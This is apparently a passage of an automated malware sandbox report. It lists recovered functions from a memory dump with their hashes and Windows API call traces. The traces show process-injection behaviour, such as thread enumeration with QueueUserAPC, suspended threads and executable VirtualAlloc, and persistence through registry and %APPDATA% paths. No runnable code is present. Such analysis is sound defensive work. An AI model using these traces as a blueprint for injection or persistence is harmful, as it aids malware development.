  • Instruction ID: 50267dbfc79e7e53958b6cba9acd06bd661d4a86ea51a5bd4c245a4c386a7ff5
  • Opcode Fuzzy Hash: 8DF095610946C3D35417545580B03B89004AFD22F2C4D43FAE9303D1CB7E1235D7765F
  • Instruction Fuzzy Hash: 50267dbfc79e7e53958b6cba9acd06bd661d4a86ea51a5bd4c245a4c386a7ff5
APIs
    • Part of subcall function 001DDAD4: memcpy.NTDLL(00000000,00000084,00000084,001CD4DC,00000000,00000000,001DDB4C,001CD4DC,001CD4DC,001CD4DC,00000000,?,?,001C4CB1,00000000,00000001), ref: 001DDAF2
    • Part of subcall function 001DDAD4: memset.NTDLL ref: 001DDB24
  • RtlAllocateHeap.NTDLL(00000000,00000008,-00000008), ref: 001C3FE9
  • lstrcmpi.KERNEL32(00000000,001ED273), ref: 001C4009
    • Part of subcall function 001C5816: lstrlen.KERNEL32(00000008,?,?,?,001C402D,00000000,00000000), ref: 001C5876
    • Part of subcall function 001C5816: HeapFree.KERNEL32(00000000,00000000), ref: 001C5898
    • Part of subcall function 001C5816: memcpy.NTDLL(00000000,00000000,00000000,?,?,?,001C402D,00000000,00000000), ref: 001C58AA
    • Part of subcall function 001C5816: lstrcpy.KERNEL32(00000020,00000008), ref: 001C58DC
    • Part of subcall function 001C5816: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C58E8
    • Part of subcall function 001C5816: Sleep.KERNEL32(0000000A), ref: 001C58F2
    • Part of subcall function 001C5816: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5940
    • Part of subcall function 001C3F4D: RegCloseKey.ADVAPI32(?,?,?,001C403B,00000000,?,?,00000000,00000000,-00000008), ref: 001C3F87
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C404E
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C405F
    • Part of subcall function 001DD67D: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DD68A
    • Part of subcall function 001DD67D: Sleep.KERNEL32(0000000A,?,?,001DD703,001EB1C8,001EAD10,00000000,001DDF84), ref: 001DD694
    • Part of subcall function 001DD67D: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DD6E3
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 53
  • API ID: HeapFreeRegCloseKeyRegOpenKeyRtlAllocateHeap
  • String ID: Main
  • API String ID: 1238789381-521822810
  • Opcode ID: 430bf3c3e099aaf98ba0d13378e5d8da2de179d3274a2f5d09db6df723472999
  • Instruction ID: 8f29cc0f23f969ede819062a95f7fcd74d74c9a74bdfea75fafa15d21f68d3cc
  • Opcode Fuzzy Hash: CAE026B00A45C5AA403B7C81647B2F29410F9A08C20CD976BEE009F28CAE4670A27B9A
  • Instruction Fuzzy Hash: 8f29cc0f23f969ede819062a95f7fcd74d74c9a74bdfea75fafa15d21f68d3cc
APIs
  • RegOpenKeyA.ADVAPI32(80000001,?), ref: 001C4220
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C4256
  • HeapFree.KERNEL32(00000000,?), ref: 001C428F
  • RegCloseKey.ADVAPI32(?), ref: 001C4298
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 45
  • API ID: CreateDirectoryHeapFreeRtlAllocateHeaplstrlen
  • String ID: %APPDATA%\Microsoft\
  • API String ID: 3959905781-2699254172
  • Opcode ID: a91e168cb75582dc69dc678417b6008db4073c04297a41e19573c560bdc487dc
  • Instruction ID: cffe0b6492667c1a66e0568daab83b9343bd146d6441e28ba88ab90f7e1d944e
  • Opcode Fuzzy Hash: 10D05EB0444802AB953BA426806A739884A7F823D0C5E7536E9404A26FBB9362956E6A
  • Instruction Fuzzy Hash: cffe0b6492667c1a66e0568daab83b9343bd146d6441e28ba88ab90f7e1d944e
APIs
  • RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C29D8
    • Part of subcall function 001D6CC6: lstrlen.KERNEL32(?,?,00000000,?,00000000,001C7543,?,?,?,?,?,?,?,?,?,001C1255), ref: 001D6CD5
  • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,001C2A7A,00000000), ref: 001C2A06
  • lstrlenW.KERNEL32(00000000,?,?,001C2A7A,00000000), ref: 001C2A12
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C2A2A
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: lstrlen$RtlAllocateHeap
  • String ID: [FILE]$DllRegisterServer
  • API String ID: 2544908171-3029713317
  • Opcode ID: 2d4b95e8c34fd7eb35c32aaba08f5fcf9921a6e8c8be63207aa385bfa2f516c2
  • Instruction ID: 5cabe30f11294075a22546247cc9a04f0ebb488a8614786e1935660b83a97d3e
  • Opcode Fuzzy Hash: 73C012709914038B04177926842423CC68A39957E540E0619E8473611A5B0302CD5A1E
  • Instruction Fuzzy Hash: 5cabe30f11294075a22546247cc9a04f0ebb488a8614786e1935660b83a97d3e
APIs
  • lstrlenW.KERNEL32(00000000,00000000,00000000,.dll,001C2B1B,00000000,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001D9EB8
  • lstrlen.KERNEL32(DllRegisterServer), ref: 001D9EC6
  • RtlAllocateHeap.NTDLL(00000000,00000022), ref: 001D9EDB
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 40
  • API ID: HeapFreeInterlockedExchangeRtlAllocateHeapmemcpywsprintf
  • String ID:
  • API String ID: 3372225998-0
  • Opcode ID: 61e3c6596c7711a58e405f94e11cad7776fca466765ac99ea6157a7d77fb77b6
  • Instruction ID: da8d2039801b4c8d43c4b5d75199c0239940cb1666a4492243b1b8028872bfb2
  • Opcode Fuzzy Hash: B6110E75048A40CF89337492402A6BBDA81BD914C798C9763E90C3A5AF4903F29B7F07
  • Instruction Fuzzy Hash: da8d2039801b4c8d43c4b5d75199c0239940cb1666a4492243b1b8028872bfb2
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001D8FBB: GetLocalTime.KERNEL32(?), ref: 001D8FC5
    • Part of subcall function 001D8FBB: wsprintfA.USER32 ref: 001D8FF1
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
  • wsprintfA.USER32 ref: 001CB04B
  • memcpy.NTDLL(00000000,?,?), ref: 001CB090
  • InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
    • Part of subcall function 001C5B7B: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001C5BA4
    • Part of subcall function 001C5B7B: memcpy.NTDLL(00000000,?,?), ref: 001C5BB7
    • Part of subcall function 001C5B7B: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C5BC8
    • Part of subcall function 001C5B7B: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5BDD
    • Part of subcall function 001C5B7B: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C5C15
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: HeapFreememcpy$RtlAllocateHeap
  • String ID:
  • API String ID: 1281497405-0
  • Opcode ID: c91cc279de764e5f2579d6076ec579c7e1ff7f10485d5d5ea4a8a547ad6caca9
  • Instruction ID: 3ae8df9311abcb48d6f96013da2b6f76f4bc533e0507b6b7ad3ca337a4177261
  • Opcode Fuzzy Hash: D1014E13C804C3878807342E9024AB8C449BE822C0DCDD316AA081C13F8BA232B7764F
  • Instruction Fuzzy Hash: 3ae8df9311abcb48d6f96013da2b6f76f4bc533e0507b6b7ad3ca337a4177261
APIs
    • Part of subcall function 001C8692: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C86CC
  • RtlAllocateHeap.NTDLL(00000000,001E5065,?), ref: 001C8BEE
  • memcpy.NTDLL(00000000,00000000,00000000), ref: 001C8C05
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8C18
  • memcpy.NTDLL(00000000,?,?), ref: 001C8C27
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8C8B
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
    • Part of subcall function 001DAA89: RtlLeaveCriticalSection.NTDLL(?), ref: 001DAB06
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFree$RegCloseKeyWaitForSingleObject
  • String ID:
  • API String ID: 3052965740-0
  • Opcode ID: d3c070adaf0f083c3fd626d879ba680c8654bd575e600ed9f9379d1952a7449c
  • Instruction ID: ae659000fd8a6ff0622346f66fb9775bf8617b043a7e92e8c3d009521b2ea922
  • Opcode Fuzzy Hash: 1B01F521055AD313C12BA88192BA3FA8505BF829E1D4D1737FEB81E18C5F4721E6A707
  • Instruction Fuzzy Hash: ae659000fd8a6ff0622346f66fb9775bf8617b043a7e92e8c3d009521b2ea922
APIs
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
  • HeapFree.KERNEL32(00000000,?), ref: 001C46AF
  • WaitForSingleObject.KERNEL32(00000000), ref: 001C4713
  • HeapFree.KERNEL32(00000000,?), ref: 001C473C
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C474C
  • RegCloseKey.ADVAPI32(?,?,?,00000000,001CB4E0,00000000,00000000,?,001CD6FE), ref: 001C4755
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: CreateWaitableTimerGetLastErrorGetSystemTimeAsFileTimeHeapFreeOpenWaitableTimer
  • String ID:
  • API String ID: 1165046961-0
  • Opcode ID: dcf0f1391520f43fe6097fd0f752f71d1dc6f160b6cfea933156b7ea3217ac6e
  • Instruction ID: 47380e5463a91fa5f58a51e79f45711cdea6db2302c913f91e1116e2b5f0794b
  • Opcode Fuzzy Hash: 3BF02BA00A858783E07B64608177BB58300EBC25D5D8C2733F65D5DB5D8F46B1A2FA25
  • Instruction Fuzzy Hash: 47380e5463a91fa5f58a51e79f45711cdea6db2302c913f91e1116e2b5f0794b
APIs
  • OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 001C43B2
  • CreateWaitableTimerA.KERNEL32(001EB0D8,?,?), ref: 001C43D1
  • GetLastError.KERNEL32 ref: 001C43E1
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000002,?), ref: 001C4428
  • HeapFree.KERNEL32(00000000,00000002,00000000), ref: 001C445C
    • Part of subcall function 001C4349: GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C4356
    • Part of subcall function 001C4349: SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 001C4390
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: HeapFreeRtlAllocateHeaplstrcpylstrcpynlstrlen
  • String ID:
  • API String ID: 2577868549-0
  • Opcode ID: 1d80e047f999f10d401b9f46cfff4084342c566a149a0ba19b39b0a0f7985056
  • Instruction ID: 2369ec942959bcc0f81c5e1f9b71a5b6904734b35236ac73d6e48e3a05a83d19
  • Opcode Fuzzy Hash: C6F08B2B448E429BC027204202A67D8E71CBB818DAC4D8B319884795AE2EC272225B0A
  • Instruction Fuzzy Hash: 2369ec942959bcc0f81c5e1f9b71a5b6904734b35236ac73d6e48e3a05a83d19
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000007), ref: 001C9F8D
  • lstrcpy.KERNEL32(00000000,001EC424), ref: 001C9F9F
  • lstrcpyn.KERNEL32(00000006,?,00000001,?,?,?,?,?,00000000,00000000,?), ref: 001C9FAC
  • lstrlen.KERNEL32(001EC424,?,?,?,?,?,00000000,00000000,?), ref: 001C9FBE
    • Part of subcall function 001CA73F: RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 001CA760
    • Part of subcall function 001CA73F: wsprintfA.USER32 ref: 001CA775
    • Part of subcall function 001CA73F: RegCreateKeyA.ADVAPI32(80000001,001EB240,00000000), ref: 001CA78D
    • Part of subcall function 001CA73F: RegCloseKey.ADVAPI32(?), ref: 001CA7B5
    • Part of subcall function 001CA73F: HeapFree.KERNEL32(00000000,00000000), ref: 001CA7C4
    • Part of subcall function 001CAF14: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001CAF14: wsprintfA.USER32 ref: 001CB04B
    • Part of subcall function 001CAF14: memcpy.NTDLL(00000000,?,?), ref: 001CB090
    • Part of subcall function 001CAF14: InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CAF14: HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C9FEF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 117
  • API ID: GetLastError$CloseHandleReleaseMutexWaitForMultipleObjects
  • String ID:
  • API String ID: 981764843-0
  • Opcode ID: e0028ebea731b05e1f81d164d1b0c22b432d0313b7510209d972350b2e9e1cbf
  • Instruction ID: 983f2bdd78a01378a5524cb3713f7215791f28ca6a77dfb9313747591b0c8092
  • Opcode Fuzzy Hash: 63F06276110C810BCE276554A46279A5A106FC23F048C1753FFF66A1EF1B527AD21B8A
  • Instruction Fuzzy Hash: 983f2bdd78a01378a5524cb3713f7215791f28ca6a77dfb9313747591b0c8092
APIs
    • Part of subcall function 001C44A4: OpenMutexA.KERNEL32(00100001,00000000,?), ref: 001C44B0
    • Part of subcall function 001C44A4: SetLastError.KERNEL32(000000B7,?,001C44F5), ref: 001C44C1
    • Part of subcall function 001C44A4: CreateMutexA.KERNEL32(001EB0D8,00000000,?,?,001C44F5), ref: 001C44D4
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C4515
  • CloseHandle.KERNEL32(00000000), ref: 001C45D3
    • Part of subcall function 001C439B: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 001C43B2
    • Part of subcall function 001C439B: CreateWaitableTimerA.KERNEL32(001EB0D8,?,?), ref: 001C43D1
    • Part of subcall function 001C439B: GetLastError.KERNEL32 ref: 001C43E1
    • Part of subcall function 001C439B: GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000002,?), ref: 001C4428
    • Part of subcall function 001C439B: HeapFree.KERNEL32(00000000,00000002,00000000), ref: 001C445C
  • GetLastError.KERNEL32 ref: 001C45BC
  • ReleaseMutex.KERNEL32(00000000), ref: 001C45C5
  • GetLastError.KERNEL32 ref: 001C45E0
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: memcpy$HeapFreeRtlAllocateHeaplstrcmpi
  • String ID:
  • API String ID: 857938089-0
  • Opcode ID: 4b4a78c487d6048ee3f3895cdad3a98188a4a88c0ba2f47e4ae26dadc0163ad9
  • Instruction ID: 3f52a085e5dd49b5850e34594fd6f7df3e0d62c374d676f882949c6103c053a0
  • Opcode Fuzzy Hash: C5F09E214D05C251D61B10B45894B94E946FE823B3C8DA7379C047908B2A4221A9B5EF
  • Instruction Fuzzy Hash: 3f52a085e5dd49b5850e34594fd6f7df3e0d62c374d676f882949c6103c053a0
APIs
    • Part of subcall function 001C57CC: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C57D4
    • Part of subcall function 001C57CC: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C57E9
    • Part of subcall function 001C57CC: InterlockedIncrement.KERNEL32(0000001C), ref: 001C5802
  • RtlAllocateHeap.NTDLL(00000000,?,001ED278), ref: 001CADC5
  • memcpy.NTDLL(00000000,?,?), ref: 001CADD6
    • Part of subcall function 001C5761: InterlockedDecrement.KERNEL32(0000001C), ref: 001C5765
  • lstrcmpi.KERNEL32(00000002,?), ref: 001CAE1C
  • memcpy.NTDLL(00000000,?,?), ref: 001CAE30
  • HeapFree.KERNEL32(00000000,00000000,001ED278), ref: 001CAE6F
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 27
  • API ID: GetSystemTimeAsFileTimeInterlockedIncrementRtlAllocateHeapRtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID:
  • API String ID: 2335115045-0
  • Opcode ID: 87b7f9457d6eb4fb8a765cd00379997a4ae998d37287d2c68f8de9ad653ea43e
  • Instruction ID: a533ae1a33582a8b524e606b503d101fc491c8f586016c526a9c3a1c080ca75d
  • Opcode Fuzzy Hash: 73F08BB11645925BD10230500D063B7F90AFBB13EAC4DFE12DD20342AB3F8321266BAC
  • Instruction Fuzzy Hash: a533ae1a33582a8b524e606b503d101fc491c8f586016c526a9c3a1c080ca75d
APIs
    • Part of subcall function 001DDA6F: lstrlen.KERNEL32(?,001EB160,001E5128,?,001DE5BF,?,00000000,001E5128,00000000,001EB16C,001EB16C,?,001DE11D,?,?,?), ref: 001DDA7B
  • RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C5A01
  • RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5A14
  • GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C5A25
  • RtlAllocateHeap.NTDLL(00000000,001EB264,?), ref: 001C5A90
  • InterlockedIncrement.KERNEL32(001EB25C), ref: 001C5AA7
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 95
  • API ID: CloseHandleGetLastError$OpenProcess
  • String ID:
  • API String ID: 3618605412-0
  • Opcode ID: f3c28a13a8270d655170a0e3c90d88c5c03aaf1802dd5309b87f7072ec2badc3
  • Instruction ID: ee927bb26a947277b8e3b3d91228e1c9832b26c7ffbdb67feee30960427366c3
  • Opcode Fuzzy Hash: 13F09E78181666838027B06098507FBF645FE821CF6AC3610F6603108A47563AD76754
  • Instruction Fuzzy Hash: ee927bb26a947277b8e3b3d91228e1c9832b26c7ffbdb67feee30960427366c3
APIs
    • Part of subcall function 001D8325: GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
    • Part of subcall function 001D8325: GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
    • Part of subcall function 001D8325: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
    • Part of subcall function 001D8325: IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
    • Part of subcall function 001D8325: CloseHandle.KERNEL32(00000000), ref: 001D8391
  • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000001), ref: 001DC517
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DC59A
    • Part of subcall function 001DC371: memset.NTDLL ref: 001DC393
    • Part of subcall function 001DC371: ResumeThread.KERNEL32(?,00000000,?,?,00000000,?,00010007,00000004,?), ref: 001DC42A
    • Part of subcall function 001DC371: WaitForSingleObject.KERNEL32(00000064), ref: 001DC438
    • Part of subcall function 001DC371: SuspendThread.KERNEL32(?), ref: 001DC450
    • Part of subcall function 001DC371: GetLastError.KERNEL32(00000000,?,00010007,00000004,?), ref: 001DC4C5
    • Part of subcall function 001DC371: ResumeThread.KERNEL32(00000004), ref: 001DC4D6
  • CloseHandle.KERNEL32(00000000), ref: 001DC592
  • CloseHandle.KERNEL32(?), ref: 001DC5AD
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DC5B5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 26
  • API ID: CloseHandleCreateThreadGetCommandLineGetLastErrorGetModuleHandle
  • String ID:
  • API String ID: 3688636283-0
  • Opcode ID: 8985e94ed4e404b0795d5a875a1daa6f27baf4ecdfa99c2ebdf40c8ebc5b8d94
  • Instruction ID: 283d28c9ebffde5815507237fddad0c111e69e01867ba4e75a4d178179002479
  • Opcode Fuzzy Hash: 55E0DCF28AC2C40BA8172662105D30B034AAB811E6AEC0393D361F00A6BB0F22DB5D4A
  • Instruction Fuzzy Hash: 283d28c9ebffde5815507237fddad0c111e69e01867ba4e75a4d178179002479
APIs
  • GetModuleHandleA.KERNEL32(001EC88E,00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CB44F
    • Part of subcall function 001C6112: RtlImageNtHeader.NTDLL(001CD6FE), ref: 001C6127
    • Part of subcall function 001C6112: VirtualAlloc.KERNEL32(00000000,01000000,00003000,00000040,?,?,00000001,001CD6FE,?,00000001,00000000,?,001CD6FE), ref: 001C61ED
  • GetCommandLineW.KERNEL32(00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CB466
  • CreateThread.KERNEL32(00000000,00000000,001C6C08,00000000,00000000,001CD6FE), ref: 001CB485
  • CloseHandle.KERNEL32(00000000), ref: 001CB490
  • GetLastError.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CB498
    • Part of subcall function 001C6241: GetModuleHandleA.KERNEL32(001EC065,00000000,001CB4C4,00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?), ref: 001C6247
    • Part of subcall function 001C6241: TlsAlloc.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C6253
    • Part of subcall function 001CB35F: CreateToolhelp32Snapshot.KERNEL32 ref: 001CB391
    • Part of subcall function 001CB35F: GetModuleHandleA.KERNEL32(001EC01D,001ED067,00000004,00000000,00000000,00000000,00000001), ref: 001CB3A8
    • Part of subcall function 001CB35F: GetProcAddress.KERNEL32(00000000), ref: 001CB3AF
    • Part of subcall function 001CB35F: Thread32First.KERNEL32(001CD6FE,0000001C), ref: 001CB3BF
    • Part of subcall function 001CB35F: OpenThread.KERNEL32(001F03FF,00000000,00000000,001CD6FE,0000001C), ref: 001CB3DA
    • Part of subcall function 001CB35F: QueueUserAPC.KERNEL32(?,00000000,00000000), ref: 001CB3EB
    • Part of subcall function 001CB35F: Thread32Next.KERNEL32(001CD6FE,0000001C), ref: 001CB3FB
    • Part of subcall function 001C8215: TlsAlloc.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C822A
    • Part of subcall function 001C47EC: memcpy.NTDLL(001EA06C,?,00000028,00000000,001EC1F2,?,001CD6FE,?,?,00000000,001CB4E0,00000000,00000000), ref: 001C481E
    • Part of subcall function 001C47EC: HeapFree.KERNEL32(00000000,?,001EC1F2), ref: 001C484F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 377
  • API ID: CloseHandleCreateFileGetFileSizeGetLastErrorReadFile
  • String ID:
  • API String ID: 1827773359-0
  • Opcode ID: 0e249ffb26827f8de4bdc9f10efd9553abeea1975b9e130743c481de3b32f60c
  • Instruction ID: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
  • Opcode Fuzzy Hash: 80E0C010A20A86DED45B5CA04402F45EF06AF50149D9C3E65B500153674F01736AAB29
  • Instruction Fuzzy Hash: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
APIs
  • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001D6D36
  • GetFileSize.KERNEL32(00000000,00000000,?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000), ref: 001D6D46
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 001D6D72
  • GetLastError.KERNEL32(?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000,00000000), ref: 001D6D97
  • CloseHandle.KERNEL32(000000FF), ref: 001D6DA8
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: GetLastError$HeapFreeRtlAllocateHeapWaitForSingleObject
  • String ID:
  • API String ID: 1129198028-0
  • Opcode ID: e3a02cbeabdfe4a2cd864ccd1553d94aed3507c904c4d03dee893086ea269868
  • Instruction ID: 59916db0f0ba61348a2dee30f2c028260359dd5f044f847590a39ac0bfcd07d8
  • Opcode Fuzzy Hash: C7E05C64444FC296C00FB62559903FB5B466F41BD3D4C5623B8042404D3F4633F7296E
  • Instruction Fuzzy Hash: 59916db0f0ba61348a2dee30f2c028260359dd5f044f847590a39ac0bfcd07d8
APIs
  • RtlAllocateHeap.NTDLL(00000000,00004000), ref: 001C84BC
  • GetLastError.KERNEL32 ref: 001C84DF
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001C84F2
  • GetLastError.KERNEL32 ref: 001C84FD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8545
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 61
  • API ID: CreateDirectoryDeleteFileGetLastErrorHeapFreeRemoveDirectory
  • String ID:
  • API String ID: 4079355387-0
  • Opcode ID: 8c67f55a15a2c5e2e65c1e56377dd64d01b0e2d18364e0ba4940ce76a46808fc
  • Instruction ID: 065d5ed1bcaf4d35961f09f99a339e463c93b1b32b72de6584e4f84f246ea1e5
  • Opcode Fuzzy Hash: B9E0C9764404804A4CA7D8A9A86C27E458316539E2C0D4335F5793B8A7DEA129BE0F93
  • Instruction Fuzzy Hash: 065d5ed1bcaf4d35961f09f99a339e463c93b1b32b72de6584e4f84f246ea1e5
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • DeleteFileA.KERNEL32(00000000,000004D2), ref: 001C11D6
